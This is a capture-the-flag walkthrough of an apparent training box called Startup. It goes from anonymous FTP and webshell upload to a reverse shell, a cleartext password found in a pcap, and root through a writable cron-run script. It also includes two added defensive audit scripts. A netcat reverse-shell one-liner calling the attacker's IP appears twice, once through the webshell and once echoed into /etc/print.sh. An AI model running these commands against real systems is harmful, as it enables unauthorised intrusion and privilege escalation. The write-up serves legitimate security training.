Startup

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so the scan does not stop at a blocked ping probe:

nmap -Pn 10.10.50.218

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.50.218

Enumeration

Port 21: FTP

From the nmap scan we can see that we are allowed to log in as anonymous, so let's log in and see what we can find.

Username: anonymous

Password: anonymous

ftp 10.10.50.218

Let's list the files on the server.

There is a directory and 3 files. Let's get the files first and then see what is in the directory.

get <file-name>

Now let's cd into the ftp directory and check the files.

cd ftp
ls -la

Looks like there is nothing in the directory. Now let's get back to our machine and read the files.

cat notice.txt

We now have a possible username, Maya, so let's add that to our notes.

The image does not contain anything interesting, but it does have something we should think about :)

There is nothing in .test.log:

cat .test.log

Looks like that is all we get from FTP.

Port 80: HTTP

Let's visit the website.

Let's look at the source code.

Nothing of interest. Let's use gobuster to find hidden directories:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.50.218/

We found a directory called /files, so let's visit it.

Looks like the same files we found in the FTP server.

Exploitation

Looking at the ftp directory on the FTP server, we had permission to write to it, and that directory is also served by the web server. That means we could upload a webshell over FTP and then reach it through the web page.
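The weakness here is an upload directory that is both writable by an unauthenticated account and served by the web server. The following shell script is an added example (not part of the original writeup) of the audit a defender would run on the web root to catch that combination: it lists directories writable by "other" and then looks for server-side script files sitting inside them. The sample tree is constructed in a temp directory and mirrors the files/ftp layout the writeup describes; the file and directory names are assumptions.

```shell
#!/bin/sh
# Added example: audit a web root for world-writable directories and for
# server-side scripts that have been dropped into them.
# The sample tree below is constructed for the example (files/ftp mirrors
# the path used on the box); nothing on the real host is touched.

# Print every directory under $1 that has the "other" write bit set.
find_world_writable_dirs() {
    find "$1" -type d -perm -o+w 2>/dev/null | sort
}

# Print every file under $1 whose extension a PHP-enabled web server executes.
find_server_side_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \) 2>/dev/null | sort
}

# Build a constructed sample web root and print its path.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/files/ftp" "$root/files/private"
    chmod 777 "$root/files/ftp"       # the weak setting: anyone can drop files here
    chmod 755 "$root/files/private"   # the corrected setting
    : > "$root/index.php"             # legitimate application code
    : > "$root/files/ftp/web.php"     # an unexpected script inside the upload dir
    : > "$root/files/ftp/notice.txt"  # a harmless upload
    echo "$root"
}

# Run both checks over a web root and print the findings.
audit_webroot() {
    echo "== directories writable by other under $1 =="
    find_world_writable_dirs "$1"
    echo "== server-side scripts inside those directories =="
    for d in $(find_world_writable_dirs "$1"); do
        find_server_side_files "$d"
    done
}

root=$(make_sample_webroot)
audit_webroot "$root"
rm -rf "$root"
```

Run it as is to see the constructed findings, or call audit_webroot /var/www/html on a real host. A hit in the second list (a .php file inside a directory anyone can write to) is exactly the web.php situation this room is built around; the fix is to remove the write bit for the FTP account or to serve uploads with script execution disabled.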

We can use this webshell for that. Once you have copied it to your directory, log in through FTP and cd into the ftp directory. I moved the index.php (which I renamed web.php) to the /Startup directory before logging in.

Now put the file into the directory using the put command:

put web.php

Now that web.php is in the directory, let's visit it on the website.

Now we can run commands through the webshell. Let's get a reverse shell; we can get the command from here:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

We also have to start a netcat listener on our machine:

nc -lvnp 1234

Now we run the command through the webshell.

Once you do, you get a reverse shell.

Once on the box, use these commands to stabilize the shell.

Looking through the directories, there was one unusual directory: /incidents.

It holds a pcapng file, so let's try to get information from it. First we need to copy it to the ftp directory so that we can download it from the website:

cp suspicious.pcapng /var/www/html/files/ftp/

Once we have done this, we can download the file from the website.

Once downloaded, you can open it with Wireshark using this command:

wireshark suspicious.pcapng

After you run this command, Wireshark opens the capture.

Following a TCP stream, we come across something interesting: a password sent in cleartext.

Let's try to use this password, c4ntg3t3n0ughsp1c3, to switch users to Lennie on the machine:

su lennie

Looks like we are now Lennie. We can read user.txt now.

Also, looking at the starting directory, we find another interesting file called recipe.txt. Let's read that:

cat recipe.txt

This is the answer to the first question of the room

Privilege Escalation

We see a file called planner.sh in the scripts directory under Lennie's home directory. Let's read it:

cat planner.sh

It executes a file called /etc/print.sh. Let's read that file:

cat /etc/print.sh

It is a bash script that just prints "Done!". It is run by a scheduled task as root and is writable by us, so what if we echo a reverse shell into it and listen on our machine? Would that give us root? Let's try it out.

We can reuse the reverse shell command from before and echo it into the file:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" > /etc/print.sh

Also make sure you have started a netcat listener; after a while you get a reverse shell, this time as root.

You can now read the root.txt flag.
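The root cause of this escalation is a script executed by a privileged scheduled task while being writable by an unprivileged user. The following shell script is an added example (not from the original writeup) of the check a defender would run against such a scheduler script: it pulls out the .sh paths the script invokes and reports any that group or other can write to. The sample planner.sh, print.sh and backup.sh are constructed in a temp directory for the example; the real /etc/print.sh is not touched.

```shell
#!/bin/sh
# Added example: find scripts invoked by a scheduler script that an
# unprivileged user could modify. Sample files are constructed in a temp
# directory; names mirror the planner.sh / print.sh pair from the box.

# Print "missing", "unsafe" (group or other has the write bit) or "ok" for $1.
script_writable_by_others() {
    [ -e "$1" ] || { echo missing; return; }
    if [ -n "$(find "$1" -prune \( -perm -g+w -o -perm -o+w \) -print 2>/dev/null)" ]; then
        echo unsafe
    else
        echo ok
    fi
}

# Print the absolute .sh paths referenced by the scheduler script $1, one per line.
called_scripts() {
    grep -oE '/[^[:space:]]+\.sh' "$1" | sort -u
}

# Report the permission status of every script the scheduler script invokes.
audit_scheduler() {
    called_scripts "$1" | while read -r target; do
        printf '%s %s\n' "$(script_writable_by_others "$target")" "$target"
    done
}

# Build the constructed sample: one world-writable target, one correctly
# permissioned target, and a planner that runs both.
make_sample() {
    root=$(mktemp -d)
    printf '#!/bin/bash\necho Done!\n' > "$root/print.sh"
    chmod 777 "$root/print.sh"    # the weak setting from the box
    printf '#!/bin/bash\necho Done!\n' > "$root/backup.sh"
    chmod 755 "$root/backup.sh"   # the corrected setting
    printf '#!/bin/bash\n/bin/bash %s/print.sh\n/bin/bash %s/backup.sh\n' "$root" "$root" > "$root/planner.sh"
    echo "$root"
}

root=$(make_sample)
audit_scheduler "$root/planner.sh"
rm -rf "$root"
```

On a real host, point audit_scheduler at each script referenced from /etc/crontab, /etc/cron.d and root's crontab. Any "unsafe" line is a script root will run that someone else can rewrite; the fix is root ownership with mode 755 (or stricter) on the script and on every directory in its path.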
